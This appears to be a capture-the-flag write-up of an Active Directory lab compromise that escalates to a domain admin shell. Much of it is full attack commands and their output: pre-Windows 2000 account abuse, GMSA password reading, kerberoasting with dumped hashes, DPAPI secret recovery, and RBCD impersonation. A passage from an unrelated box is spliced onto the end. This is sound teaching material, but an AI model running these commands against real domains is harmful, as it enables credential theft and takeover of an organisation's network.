Now, we know that we also have simple authentication enabled via LDAP which we can utilize for further enumeration.
Ldapsearch – List Users by Groups
An alternative way to enumerate users and their groups is by using ldapsearch with simple authentication:
Note the FS01$ computer account being a part of Pre-Windows 2000 Compatible Access group which we didn’t see earlier in ldapdomaindump output. That is interesting!
BloodHound Collection
I collected the loot using bloodhound-python and uploaded in bloodhound:
The reason that FS01.vintage.htb didn’t resolve here is that the target machine doesn’t have a DNS record for it:
croc@hacker$nxcldapDC01.vintage.htb-d'vintage.htb'-u'P.Rosa'-p'Rosaisbest123'-k-Mget-network-oALL=trueLDAPDC01.vintage.htb389DC01 [*] None (name:DC01)(domain:vintage.htb)LDAPDC01.vintage.htb389DC01 [+] vintage.htb\P.Rosa:Rosaisbest123 GET-NETWORKDC01.vintage.htb389DC01 [*] Querying zone for recordsGET-NETWORKDC01.vintage.htb389DC01Found1recordsGET-NETWORKDC01.vintage.htb389DC01 [+] Dumped 1 records to /home/kali/.nxc/logs/vintage.htb_network_2025-03-12_150255.logcroc@hacker$cat/home/kali/.nxc/logs/vintage.htb_network_2025-03-12_150255.logdc01.vintage.htb10.10.11.45
Data Analysis
I started with the P.Rosa account since we had its credentials, but I didn’t find anything useful there. Next, I focused on the computer objects, as we had already spotted something interesting—the Pre-Windows 2000 Compatible Access group.
Pre-Windows 2000 Compatible Access group
This group was introduced by Microsoft in Windows 2000 primarily to provide backward compatibility with Windows NT and legacy applications requiring broad read access to Active Directory. According to Microsoft,
It is a backward compatibility group which allows read access on all users and groups in the domain.
I recommend reading the following to understand the security implications of this group:
If a new computer is configured as a “Pre-Windows 2000 Computer”, it means that it’s credential is DOMAIN.TLDCOMPUTERNAME$:computername(The password is the lowercase of the computer name). However, once an authentication occurs for a pre-windows 2000 computer, it’s password usually needs to be changed.
As FS01$ is a part of this group, it’s worth checking whether we can do something with it or not. I tried to get a TGT for it which got successful:
croc@hacker$impacket-getTGT'vintage.htb/FS01$:fs01'-k-dc-ipDC01.vintage.htbImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Saving ticket in FS01$.ccache
Hence, we own the FS01$ computer object. We can also gain a SMB shell if we want:
I marked FS01 as owned and then under Analysis > Shortest Path from owned Principals, I found that the Domain Computers group, which FS01 is a member of, has ReadGMSAPassword permissions over GMSA01$.
💡 Think Box
This means that FS01$ has the permission to retrieve the password for the GMSA01$ account.
Abusing Group Managed Service Account – GMSA01$
According to BloodHound,
Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is managed by and automatically changed by Domain Controllers on a set interval(check the MSDS-ManagedPasswordInterval attribute).
The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.
Moving forward, I successfully retrieved the NTLM hash for the GMSA01$ account by authenticating as the FS01$ account using bloodyAD.
Furthermore, I got the TGT for GMSA01$ using his NTLM hash. Hence, we have full control over it.
croc@hacker$impacket-getTGT'vintage.htb/GMSA01$'-hashesaad3b435b51404eeaad3b435b51404ee:51434c5b357ff89c5f85d994a27f7339-kImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Saving ticket in GMSA01$.ccache
💡 Think Box
It’s always a good practice to revisit bloodhound when we pivot to a new user to see what we can do.
Revisiting BloodHound
I found that GMSA01$ has the ability to add itself to Service Managers group:
I used bloodyAD to add GMSA01$ to the Service Managers group:
croc@hacker$KRB5CCNAME=GMSA01\$.ccachebloodyAD-d'vintage.htb'-u'GMSA01$'-k--host'DC01.vintage.htb'addgroupMember'ServiceManagers''GMSA01$'[+] GMSA01$ added to ServiceManagers
Shell as C.Neri
Targeted Kerberoasting – Service Accounts
Investigating the Service Managers group in bloodhound, I found that the members of this group has GenericAll privilege over three service accounts: svc_ldap, svc_sql & svc_ark. This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.
Full control of a user allows us to modify properties of the user in order to perform a targeted kerberoast attack. The tool used will set an arbitrary SPN on all the svc_* accounts, request a TGS and then remove the SPN.
croc@hacker$KRB5CCNAME=GMSA01\$.ccachepython3targetedKerberoast.py-k--no-pass-d'vintage.htb'--dc-host'DC01.vintage.htb'--dc-ip'10.10.11.45'[*] Starting kerberoast attacks[*] Fetching usernames from Active Directory with LDAP[+] Printing hash for(svc_ldap)$krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb/svc_ldap*$4cace799b4753e4e7521f512d68046a6$e49b0b03add50aaf82eb2bbd2b104f1f96e87a662655bfdfd95a401f0eb5ac58f8a28394a66f85c4c89cdc9fb86161a05f55cb195b15615a32b86206e7cae10421e40e0269314b9242d3324cf882d3266a63bd9107110d252f571699e55130b8473ff8961602beec6df014aa61dd3e9dddfad02124e67e6324b37ac17edf0756cd9a0631cc5c28beae652f2337a7dcc90b0b4c94625549b42a07bae5dd336affc45fd99f9c45314eee1d6329bbdbfefe9d42b1a13d702705167c2210deff8624113c5b3d0821efcef78146b185540ac2d622ba677c1e4fc454ba128b3a296221df84776a97eb0c1223e85eba3d00cd6d07cf0879c447f789a50fe53e7881af4a32a1fc72657425be530c32554dbdf8fd4bd26b10da6de162599753bae2c915bce1b46b2a4a58b5cb29ce260aec28af2c942f283b31ae3c028e2e9c2b92ec2c21a749ce8471918cb023068f5f57c5e23652b1262a1df87d527f2849ea6628807754fa942e2353e5e4c8fc22f1079e3dc062adac1450ee0713599b59f3de4f74e00acb40613c7d7ee9574adf5d085811bfe4698d606444da84165b2807dbe4671702f72780af2ad5b42bd46a89309878018e4f83a0dd8cfbfe7a3d05b606a93917a135cf69c93062f941fe3b4f301cf5b76e3966896bad0ee3d2224477e8475ccfec98813b481226f1385507e7876c9e82814ff48ea90c4207e2c1995c743297da7ee9e031004e6134c5459e7b30cfea29193fb623c08ae2bd923945758634ac8f7c7534bc8013e2d5ef10e1d8823090ddd432810cfa17f1f81935d90d98530ac56625851e544310f877ba89bbf4ef646c505fe6a33f5e8cce70d35559d35cb5f23ba588465f3f2400c2c51de57efda9d65e1af2940c7b1d8481a135826df4e3d379d09cf2a9c95a98efff900abbd0cf17e25821c11c3642c6a80badb74014e7d375bb6f99b76def89295a4b4358600de0ea4aeb2b46e046e65474663775f9daf723e11dc4cd02c34005cd4e405c96739a7b59030bb0d312b7a51079abff82f054e91f7a2e69ae78e4184582766aa05c9577b06928ee7f008aee5acad3717641bc492a4849270a15a8106b6a94cb25196e7100b59681c33c915b1664dc1cc49042574e8a3fe23b30762acc3708514c57150a210e0a811fe26af640ac1d5e6f0b132dfb6484edc38536c0fab621aa0382c77939c432eb88118515c79beffd473e220dc84ad58d2c56165056bdc4a7e8687ced370cfff7582381cd4777aaece2b8d7b5ee9005dec1a2e711822fbfabe71293cdc7b2364fe2f48c0a490d845de191a0baa6ed6351b1c62d274a92505482e0851a9053429528935e5bd5803055568214985bd39a4d4107d0ad5306187edb7d24fd463132f77c87cd94b178c56c29b2a9a25d44cd5e45fecdb89e7c76b4f60e3c7a86933f88603a04a4c39355f3be5f24500eca[+] Printing hash for(svc_ark)$krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb/svc_ark*$ee407a467d551f7bafb41550d761efc0$eafa2a8943fd67185df83290c4a82c26cff33460d4eae96128f297ef6f6ccea3b2d6e0fb4781a7cae205045445b2df4cff0757d9c79c50a4046b6629e47db6e19309734fac086d5b314c14cc984f597c1772aaa35f794a77121fb2cea6ebf939c1efd70fd6e2614bebd4a4d27c09fcc7ec1424b93ae936bd9299d1d0fb0e27d0d687200bcb6489c66e1b4ffbf5253ef87532a703bded87c94ade871a6d6bd78ce477584dbd5780907fb11aa8fbc205bbed6ba178fbbf87c219a5780caac18dc3d91ddae2538954e18269f8f183f9f867cc4e4c08342f1f6728dd00a7e60c4fc7b10fdcf63e8b4a9e4ed924df8200ad736d77c90ab4cf80b6de2bad41ce5daf4506b7b96cee127e9c84d06a283c325c814ab9d271be38e98c4de0b6eaac13cee96c8c85b77539bcdcb770bd1572661eb5cd7e12892dd5b7be16cc0430427afcaf25ad53b862f7121a2429085a7e3cfd77faa4ddf93addc4d11c03bf07ecda671d4a616a07176b6d93469ad0a441dc608097566e7cb4b385ea66c6b66d47d629f43a81377117bf855e6e279b60d1ea670fa3fe90d4f17a42422bce6421d551b890724a060a0a37f2f2f3eafeaeda5005394a8b2a1c6dcfe06bcb96119caf2d08911cdebf0147792642f24c217706c9355bfbbeffa40896429dfb45b0bba1124f106e7fe92e46f70ec8cab2267d822f2472b557c5b99ec011b16906b17235ebe0a5c82eee5886d3675f852b86a39f26cbe7b8e2afc2f10b227e4b24c8488986477dc199a27cade4f2048dd6f4f5b60269b9da9a8c8911ff7f85bc4b8b747f05b9d37879e4c01d20c2c5b025251a7b18911740a9cfd08f990dcb68b29f9951b8140e0d96a47c92401af16e521b76a9f6dfc7a258767e8ea1b790054d2dec6a087d0df464caea8a0d641e9335449d2ba24c008146d0fa54b56f4dfd7392e9d2eb5ffee38a1863bf242e6a94d367eb8d19b5c00bb1611f35727669c1e52b993ccca0fd4818b3f9ea62b841a69dda4497f174a6e69327d8fdde71212ab89ca1efdb6b6a04768569055fe493d2e71617abd42bac1c81325f5a59ce6926e5b59e9020d97e9148b88d86bfee9cd4e3ec6abd9f1df17c77b3e3a92eba2daa25cf3e976233ca24d04a0cc01f39997155d9c88c2397e5e12c57b0ef8c5dfe886ff7bc15cef3f04f765fbca7ef8efbb72ef4ed5af83def90dcdcf6c6564a1450101cd2de2ddd1bb74b9ea216667c1a5f713ef21c948b4005791309244c757571325ec7a0a20367b30297db3aa3dcf9ca7158e31ee3d78708b9a9ccd30f706bfef42267616861554559e6dbd8bf4d59f6b7cfd4ff8d4d1fd6efd251b9bcd0b5ac98fbddbb86a0837ef4bc34a8ceba632fdd957acad4c9e92e043d3bc012527c0d14e1c26446abc3cd7a90cefdee3159f7ec0cbc46614cbc33d285622b9b48885c57724b8359cfae066f4b
Note that this only retrieved the TGS for two service accounts. The svc_sql account is absent from the output. This is because it is not enabled, as you can see below in bloodhound:
💡 Think Box
The best bet is to enable the svc_sql account by ourselves so that we are not missing anything that may lead us to further access.
I enabled the svc_sql account using bloodyAD:
croc@hacker$KRB5CCNAME=GMSA01\$.ccachebloodyAD-u'gMSA01'--host'DC01.vintage.htb'-d'vintage.htb'-kremoveuac'svc_sql'-fACCOUNTDISABLE[-]['ACCOUNTDISABLE'] property flags removed from svc_sql's userAccountControl
Now that the svc_sql account is enabled, performing the targeted kerberoasting again successfully retrieved the TGS for all three service accounts.
croc@hacker$KRB5CCNAMEGMSA01\$.ccachepython3targetedKerberoast.py-k--no-pass-d'vintage.htb'--dc-host'DC01.vintage.htb'--dc-ip'10.10.11.45'[*] Starting kerberoast attacks[*] Fetching usernames from Active Directory with LDAP[+] Printing hash for(svc_sql)$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$f335c53b04bd9c45c92837e8434a5f8b$e709bf0486c63008fc63fdd6766dec4959034745134b45cbfb65b17771db0881a918f5970c7b06021a50adc910627f0811c62d3bee2d90b35a69ef51253a9dd8ce71af0d0c5be3fab0da2350926154a0faccbce694bc8e51fc7f6cad660c464bdb17963230064ae4326128df1db41de1c7f3b45563cbad9db57c0f4911d8464a303f19ee40c34785f03490a5223b640a3f82cae500430a97417e86b9b8cb91226e0076724cc3023e2623a76685d2cd0106ec16ae62d25b3793185b0bc55575f93e6062ca6fbbcaae8974cc0667338443b383041752bc82b9483c6d658cdbcd174ea16b648f43684863cfe2c5775078be49fb2325394f2c643cbf0928413ad5688536ce870db4107aa2832ccb65ae6f2fdc34553a189df3a282ca9b33f9c777d5d3541a9aa382647e6db7f1208a46986ba204760d43fbbedef15b339a22b466afaeda90d9df0a8c0bc22c4ef42e554a96dd6e4353aa6a7874999966aa51dda6599ea603ee84b1266423a277fb9f2e867e4b0286b328da2ee860d5fd69ed1fe03f4bb100cbab0d751a00f9bd948097f9894ab52cd60d65eec2db14ffe5118d4d206aa0d812762c098afb4e443f0d3989b6162a40f898a5903ec76ac33072103154d4eecdd1c8eb0c767b5e9c5d77ba9f9c68e24d68915f20683d77c8bfec8119c57e44754e06061b9fba2571d78d6eedf20c7e80b2102cf446e15baca64e8742c21383f1200a91af9c310de03955e477c8a04ff785fc001583b4b918b6f994419392af4b3689d22c1ab4943f31f5a3ddd63c3f9f15caabf860312eb59c76b18653f6318e7f3b683d6581703df8437095132468c94c90574098523a1e61a33d824ab47c4e9ba1c5231aea16c6003486ff822ba3400405dae45b8b2c6e38dee269baf89f4c377671ba558a7e6b5f7427c991c5dcb4cf21a99bd1c1f164bc4ca58d6c69f4a5444ba2e974bc85526c984950235fcbfc136828986c44cd7d71bb6b93046b2be3caac37ac730c8d6b104bb911d778cbec110a7e20a8be8c52ff5ee7f538d039b4ac38ffc11b44f6f0e23b2319d896ce5ce6857a319f3e9de3cea8656684fa4d5d154654ddeddaf427746b9651fd632d790276a74ac63604018c3bb5fdc6b7b2cbffe11c5e83a85ac83b233296d081a485627d5ff400373bcb46d09e6e439bb2be831bad2105d5103e06d7220f532069a09de71625facfdb8986b7f53631d265d29bb55e287832c74857d3a2076f348c9a3627145cc5d5f57d08cabeec5ca7fd7406a4b934545f9910c42e998d03462f3d95d1d00762fea22508ffffc4268514474688e15272d8846ee7561f75d6e4a648cee84a67fe5e2cf06e61305f0a4d543ea1c7ccb34aed6ff9ec4effb3a649b73b1e7f942a962189c35b23553387d5eea2ec96507cc771188c7371aaf23b7fbaa8dd786a87243b76cbe4470d4008a41deb[+] Printing hash for(svc_ldap)$krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb/svc_ldap*$04ae435466cebf9d090c728e2246d615$5747ffa3888c0b11587a353ff56bf5c9d679a396deb9d6a06282aa2d60bf391e2ef199bbdb8de00e3d750d213aa1e4cfe53e90242f84119b4916545dc1744294fbd35e68df8f5d8cc7771bf54d2c0920510051773f974623c2928876684f6f266b592a961c5a37106823923dafb1a8ce3cbc967b4b67eecfb223547edea93e1008e42c917596f3d79c20b9bc12c8106d5df7ec932a752737756376320a7d8496fe607115828c738a0dc69d4828ccca141d271e0a40d150baa2d6f40ab7c1bc605608ed2a0d6c27329e14e6510fb1b1c1075886352ccb839e3bb5046990e3cf63f5b703782f91514074cef920010fbb5fc2958607793f436e4ea98566e0fbe25b6fe61a54a1f4332086f0e9f4981747b7ad9af4e05d1770362d175d06c8aaa306c2bda7e54710c588c18d9fa3a9a775e97949ef6bc1732aca34206dab4bcf9a7548b480fba8a7e4d2554e945589fae3ac9cf8da08836bdc2111906a75a6cf067dbf86561ef3c09b2122ec41ca8d1a792ce930c044d8f560721bce655d0e4d645c7b24e6ca1e2c61b0885260890917b1a4df67d1df22648187e1aab6ec99542860f6b9b9c2e42463bd6cdc85d1b9ffe6117cedc3d7570254e78cd3e29230eaf1c13a13d0fe7e4a7c6d066926f1a95121446bf23457a8d6fcdb5339be55f8025de6462033875303f9a4b63ea3511256d8da63e0734c7e6b1ee04d3f474dbbf5a0959eca47b9ed5afffe0bc6b485d390ff0c999ac5671d2772030b900f8090c5227f2b1e8da3b680ab8ce0753276b428d8ea345256cd61538ac685fd20380b080056697232a1eea7258f32d747efdc34d33d15d69339de737236cecee2a4d41a2baa7c78a9b5af6a7cbf0d8ee668652db936334c70ad59b8dfb6d5db7d1e238dfa4a477c9384560f63b4db1f5ac5f08bd9ca75145d388892abdd029e0a0342c8b63e8dea57ccaef21278a0d04175ea4d5ff936bd8753a3d7740c5476964532b447f9b4f16df0f4cfa5181ead99eb1c200b209f53e710cbf0e6d83143ad61d593063f31b696074ccd584c09bcddf6fc34f5b6ef7189d8cd5d5b89b744f378843563ed5d51c5e6040f62589aa05227d647cc8be6cc7d0c48d5cd44d465624406b70dbd592a7df99d0e6a0a2a76599628435a5e779e0a3d66533cbef25f34281548900f48302997ea2c2d05ad7928be6cb384fec373c93be660eb514c5549c027f84e6884b66edc9b30772e2e6781bb0d745d7659e50dea2a3e8f170a6c976b0394bb15215b724e829080d88df8b50333f48b157b9df85da32fd334e875f46d5e71a08c35f255336fe8e54f0f58e6c520b7519ef3dee6c1eb3617f78f807da7ab430c2326c87ec2a2609b8ecbbf2696cc0380613887f78296966bddaf6c336aa73ee4cecbe56c1e3bc544f171f757afb0361726ea5a8ac654d2a6710f6c7635a40214b25e728e[+] Printing hash for(svc_ark)$krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb/svc_ark*$2c51e4092cc7433908e17559948a3638$22ba31d929ec8aab275f490ebf03a63d0923d73e124cf255002ae90490f7576e2999c5347c531c22d8ada3042a057865fdaf1d1fee9bacb269cd80412e6c82d422198c7d387867107bb9bf30343a1bfba0e2625a97095743feb966e4676bc30748190702438e719943cfd09ed9840f267c66f3395b051498d17457cddd3d7e94bd15224e170b5ea91864d00fd8871236fe3ffa0ba98944726a2d37d9a67a7c8b49e8d9c3636f140c303be7262e9f4c07d793cce49f07126932cac85bbafe6f02a1037b4f0ae567d4e154a9272425ef2d206c7cc78055307c3e5a2c36bdf2e48970f2f903a825ed1cf4c5192eb316b5dab8e6fc99d266fc3df78b284ad582dd4a258c2faa602591f2b8bd9a76e4b9ca827fec241113fbc484d90a35de14ff46434887b02fc551320ec53d6357a5cd018c11025d95caaaae87ff7a80e2fdfc8f445433c2254d652e35f69693cb08763c652067024ee03ac6afd71fd459d52965e38e5e36ce325bae11b601024146bff6596a817bbf1db687a838307d89c8a77e1594bd8bcfb96bc214f6392bc45cfa325846239061e98f93d2f74cfd02e0856de63c6d414cdc30eaa81ca54c79d97426c96d1d0cbb99722a383a7a9918e934ef2f8142c08245c1cd937d805898f4ce24e8033631af843f442d0905f2bc1b95345359082fd3804b971136fb09bff1d067d9c4e3b2d29fc6c5f3e360d1a593023b0ce1cdb4528330300c83378631da578dff0ec2dafbbd4d55175c0db04e77297775eed6e1f3e5b97e2034e934325d11a0b085d184f537e01cd8340a006b10ef4b9c4347caba7728ecec7d98e91a0af0642038abd23722fb9db0cba0b6647400d1b9d2434c33cd5e71fc382ec0f48b9585f72c31bd150dfbff55c7ad037dbd74bc2c376f6ba27fe20fb0e6d7ac2b7b08246f7d46cec7ac434fed81857daa0807037bea2b12e57ba82fa4e6fc414c5ca97c15ed4f4298c85e250a053acdc804a7531ac2369afa99e82071b15c5960b1cd00095ff97d366f4a6eb7464afc6605cff12416beb189f323c372eb556a5aecb682e9e965f47c385ea9175d0ec7d941e610746b7bce4edcc258de001929dfdce53caecdee10c3ef03d30d879e039f164eac99a3154fa7a9abd93e2ce33b9df729b81bf8fac5c24bec2b0042a3da9c8162bee478bf96b5073cb6dd36a69c2a49ed74ac10b9d0287975c73fdb00d16f436d332bd00631083e9106c3add62117e4922fe5f64d9cc4c6dbc64a441061df4f49b7eafd61a005ff503e73172c4f96eb87f95e0fde1a0db358b9106526ed9949da0abeb87ff2eac7fde7babb2717df1c2edea76ee5f0f003a1eb036babf3fffc94fe28706b1f6da5c38daf7649ec4be0a3a3679f6ef0f4d8a5b0b8b0f3f200c5544bc1b963ad152f6c13eaf3df7649c7d5830fb4e25c2903c34e8690e2e7b43faf4bcfe0eef1
Cracking the TGS Hashes
I used hashcat to crack the hashes and luckily one of them cracked.
The password for the svc_sql account is Zer0the0ne.
💡 Think Box
The svc_sql account doesn’t have any interesting pathways in Bloodhound, so the next best thing we can go for is to spray the password to check for a password reuse.
Password Spraying
Users
First, I made a users.txt file with all the users listed in it. Usually, I do this at the very beginning of the box though.
As C.Neri a remote management user, we can have WinRM access. However, as Kerberos Authentication is a requirement, we need to set up some things first.
TGT for C.Neri
We must get the TGT for C.Neri which we will use for authentication afterwards:
croc@hacker$impacket-getTGT'vintage.htb/C.Neri:Zer0the0ne'-k-dc-ip'DC01.vintage.htb'Impacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Saving ticket in C.Neri.ccache
/etc/krb5.conf
We must also configure the /etc/krb5.conf file. Luckily, I found a script that does this for us:
I used the above script to configure the /etc/krb5.conf file for our domain:
croc@hacker$python3configure_krb5.py-husage:configure_krb5.py [-h] domain_fqdn dc_nameConfigurekrb5.confforevil-winrmpositionalarguments:domain_fqdnDomainFQDNdc_nameDomainControllerNameoptions:-h,--helpshowthishelpmessageandexitcroc@hacker$python3configure_krb5.pyvintage.htbDC01[*] This script must be run as root[*] Configuration Data:[libdefault]default_realm=VINTAGE.HTB[realms]VINTAGE.HTB={kdc=dc01.vintage.htbadmin_server=dc01.vintage.htb }[domain_realm]vintage.htb=VINTAGE.HTB.vintage.htb=VINTAGE.HTB[!] Above Configuration will overwrite /etc/krb5.conf, are you sure?[y/N] y[+] /etc/krb5.conf has been configured
WinRM
As we have got the TGT & the /etc/krb5.conf configuration is done as well, we can now have WinRM access as C.Neri:
croc@hacker$KRB5CCNAME=C.Neri.ccacheevil-winrm-i'DC01.vintage.htb'-r'vintage.htb'Evil-WinRMshellv3.7Warning:Remotepathcompletionsisdisabledduetorubylimitation:undefinedmethod`quoting_detection_proc' for module RelineData: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\C.Neri\Documents>
After being stuck for quite a while here, I took a step back and reviewed the information we’ve gathered so far. I noticed that C.Neri has a separate admin account, C.Neri_adm. This led me to consider that the end user may have carried out administrative tasks using C.Neri_adm while logged in as C.Neri — which is quite common.
If that’s the case, there could be cached credentials on the machine worth checking. Let’s see!
Uncovering DPAPI Secrets
The DPAPI (Data Protection API) is an internal component in the Windows system that allows various applications to store sensitive data (e.g. passwords) in an encrypted format. Read more below:
I tried using seatbelt.exe in order to enumerate the DPAPI blobs but I got hit by AV(which is interesting). Mimikatz isn’t a viable option either because it doesn’t work well with a evil-winrm session & we also have AV in place.
Hence, it’s better to go the manual way of enumeration. Looking at the common paths for Windows Credential Manager DPAPI blobs, the following cached credentials were found under the blob storage of C.Neri:
From here, we’ll transfer all these mentioned files to our Kali Machine. After that, we will decrypt the master keys with the C.Neri’s password & then use those decrypted keys to try to decrypt the blobs.
Step 03 – Download blobs & master keys
We will be using Apache Web Server and the [System.Net.WebClient] method to HTTP POST them back to our Kali machine. You can use the following guide from 0xBEN:
The password for c.neri_adm is Uncr4ck4bl3P4ssW0rd0312.
Revisiting Bloodhound
I marked c.neri_adm as owned and under First Degree Object Control, we can see that it has the GenericWrite and AddSelf privilege over the Delegated Admins Group.
We can further see that the Delegated Admins group has AllowedtoAct DACL on DC01.
The DelegatedAdmins group has been granted Resource-Based Constrained Delegation (RBCD) access to DC01.
This allows an attacker to execute a modified S4U2self/S4U2proxy abuse chain to impersonate any domain user(except the ones in the Protected Users group) and receive a valid service ticket “as” that user which can be further utilized to gain file system access on the Domain Controller.
Abusing this attack path requires an account with an SPN set and membership in the DelegatedAdmins group. This is necessary for that account to function as a delegating service.
🎆 Way Forward
C.Neri being part of the Service Managers group has GenericAll over all the svc_* accounts. We can use that to set a SPN & change the password for any of the service account.
Additionally, C.Neri_adm has GenericWrite over the Delegated Admins group & we can use it to add the service account to the group.
The target service account will be svc_ark for me. Although, it’s okay to use any of the three but avoid using svc_sql because it was disabled initially & there is a cleanup script running as well which might make trouble for you.
Step 01 – Set a SPN
First, we need to set up a servicePrincipalName for the svc_ark in order for it to act as a service account and has the ability to request service tickets from the KDC on behalf of any other user.
croc@hacker$KRB5CCNAME=C.Neri.ccachebloodyAD--host'DC01.vintage.htb'-u'C.Neri'-d'vintage.htb'-ksetobject'svc_ark''servicePrincipalName'-v'fake/fake'[+] svc_ark's servicePrincipalName has been updated
Step 02 – Add to DelegatedAdmins Group
Next, we want to add svc_ark into the Delegated Admins group in order for it to possess the delegation rights. Note that, I used the C.Neri_adm account in order to do that.
croc@hacker$bloodyAD--host'DC01.vintage.htb'-u'C.Neri_adm'-p'Uncr4ck4bl3P4ssW0rd0312'-k-d'vintage.htb'addgroupMember'DelegatedAdmins''svc_ark'[+] svc_ark added to DelegatedAdmins
Step 03 – Change the Password
I changed the password for svc_ark to Supp0rtmeonpatreon.
Everything is in place now. svc_ark is now a service account with a SPN of fake/fake and it’s part of the Delegated Admins group as well. Now, we can use it to delegate access to the domain controller as any unprotected user including Administrators like L.Bianchi_adm.
Step 04 – Delegate Access
In the following command, we are authenticating as svc_ark while impersonating L.Bianchi_adm & since wmiexec relies on cifs, we request cifs/dc01.vintage.htb.
croc@hacker:~/HTB/vintage$impacket-getST-impersonate'L.Bianchi_adm'-spn'cifs/dc01.vintage.htb'-k-dc-ip'10.10.11.45''vintage.htb/svc_ark:Supp0rtmeonpatreon'Impacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[-] CCache file is not found. Skipping...[*] Getting TGT for user[*] Impersonating L.Bianchi_adm/usr/share/doc/python3-impacket/examples/getST.py:380:DeprecationWarning:datetime.datetime.utcnow()isdeprecatedandscheduledforremovalinafutureversion.Usetimezone-awareobjectstorepresentdatetimesinUTC:datetime.datetime.now(datetime.UTC).now=datetime.datetime.utcnow()/usr/share/doc/python3-impacket/examples/getST.py:477:DeprecationWarning:datetime.datetime.utcnow()isdeprecatedandscheduledforremovalinafutureversion.Usetimezone-awareobjectstorepresentdatetimesinUTC:datetime.datetime.now(datetime.UTC).now=datetime.datetime.utcnow()+datetime.timedelta(days=1)[*] Requesting S4U2self/usr/share/doc/python3-impacket/examples/getST.py:607:DeprecationWarning:datetime.datetime.utcnow()isdeprecatedandscheduledforremovalinafutureversion.Usetimezone-awareobjectstorepresentdatetimesinUTC:datetime.datetime.now(datetime.UTC).now=datetime.datetime.utcnow()/usr/share/doc/python3-impacket/examples/getST.py:659:DeprecationWarning:datetime.datetime.utcnow()isdeprecatedandscheduledforremovalinafutureversion.Usetimezone-awareobjectstorepresentdatetimesinUTC:datetime.datetime.now(datetime.UTC).now=datetime.datetime.utcnow()+datetime.timedelta(days=1)[*] Requesting S4U2Proxy[*] Saving ticket in L.Bianchi_adm@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
WMI
croc@hacker$KRB5CCNAME=L.bianchi_adm@cifs_DC01.vintage.htb@VINTAGE.HTB.ccacheimpacket-wmiexec-k-no-passvintage.htb/L.Bianchi_adm@DC01.vintage.htbImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] SMBv3.0 dialect used[!] Launching semi-interactive shell - Careful what you execute[!] Press help for extra shell commandsC:\>whoamivintage\l.bianchi_adm
As it is common in real life windows pentests, we’re given a set of credentials to start:
Olivia/ichliebedich
nmap/TCP
Nmap showed a bunch of open ports which are typical for a Domain Controller(DC).
croc@hacker$rustscan-a10.10.11.42--ulimit5000---A-T5-Pn-oAInitial[~] Automatically increasing ulimit value to 5000.Open10.10.11.42:21Open10.10.11.42:53Open10.10.11.42:88Open10.10.11.42:135Open10.10.11.42:139Open10.10.11.42:389Open10.10.11.42:445Open10.10.11.42:464Open10.10.11.42:593Open10.10.11.42:636Open10.10.11.42:5985Open10.10.11.42:9389Open10.10.11.42:49664Open10.10.11.42:49665Open10.10.11.42:49666Open10.10.11.42:49667Open10.10.11.42:49669Open10.10.11.42:53517Open10.10.11.42:53528Open10.10.11.42:53903Open10.10.11.42:53908Open10.10.11.42:53909[~] Starting Nmap[>] The Nmap command to be run is nmap -A -T5 -Pn -oA Initial -vvv -p 21,53,88,135,139,389,445,464,593,636,9389,49664,49665,49666,49667,49669,53517,53528,53903,53908,53909 10.10.11.42StartingNmap7.95 ( https://nmap.org ) at 2025-01-21 11:34 ESTNmapscanreportfor10.10.11.42Hostisup,receiveduser-set (0.25s latency).Scannedat2025-01-2111:34:39ESTfor91sPORTSTATESERVICEREASONVERSION21/tcpopenftpsyn-ackttl127Microsoftftpd|ftp-syst:|_SYST:Windows_NT53/tcpopendomainsyn-ackttl127SimpleDNSPlus88/tcpopenkerberos-secsyn-ackttl127MicrosoftWindowsKerberos (server time:2025-01-2123:34:46Z)135/tcpopenmsrpcsyn-ackttl127MicrosoftWindowsRPC139/tcpopennetbios-ssnsyn-ackttl127MicrosoftWindowsnetbios-ssn389/tcpopenldapsyn-ackttl127MicrosoftWindowsActiveDirectoryLDAP (Domain: administrator.htb0.,Site:Default-First-Site-Name)445/tcpopenmicrosoft-ds?syn-ackttl127464/tcpopenkpasswd5?syn-ackttl127593/tcpopenncacn_httpsyn-ackttl127MicrosoftWindowsRPCoverHTTP1.0636/tcpopentcpwrappedsyn-ackttl1275985/tcpopenhttpsyn-ackttl127MicrosoftHTTPAPIhttpd2.0 (SSDP/UPnP)|_http-server-header:Microsoft-HTTPAPI/2.0|_http-title:NotFound9389/tcpopenmc-nmfsyn-ackttl127.NETMessageFraming49664/tcpopenmsrpcsyn-ackttl127MicrosoftWindowsRPC49665/tcpopenmsrpcsyn-ackttl127MicrosoftWindowsRPC49666/tcpopenmsrpcsyn-ackttl127MicrosoftWindowsRPC49667/tcpopenmsrpcsyn-ackttl127MicrosoftWindowsRPC49669/tcpopenmsrpcsyn-ackttl127MicrosoftWindowsRPC53517/tcpopenmsrpcsyn-ackttl127MicrosoftWindowsRPC53528/tcpopenmsrpcsyn-ackttl127MicrosoftWindowsRPC53903/tcpopenncacn_httpsyn-ackttl127MicrosoftWindowsRPCoverHTTP1.053908/tcpopenmsrpcsyn-ackttl127MicrosoftWindowsRPC53909/tcpopenmsrpcsyn-ackttl127MicrosoftWindowsRPCWarning:OSScanresultsmaybeunreliablebecausewecouldnotfindatleast1openand1closedportOSfingerprintnotidealbecause:Timinglevel5 (Insane) usedAggressiveOSguesses:MicrosoftWindows101703orWindows1121H2 (97%), Microsoft Windows Server 2022 (96%), Windows Server 2019 (95%), Microsoft Windows Server 2012 or 2012 R2 (94%), Microsoft Windows 10 1703 (93%), Windows Server 2022 (93%), 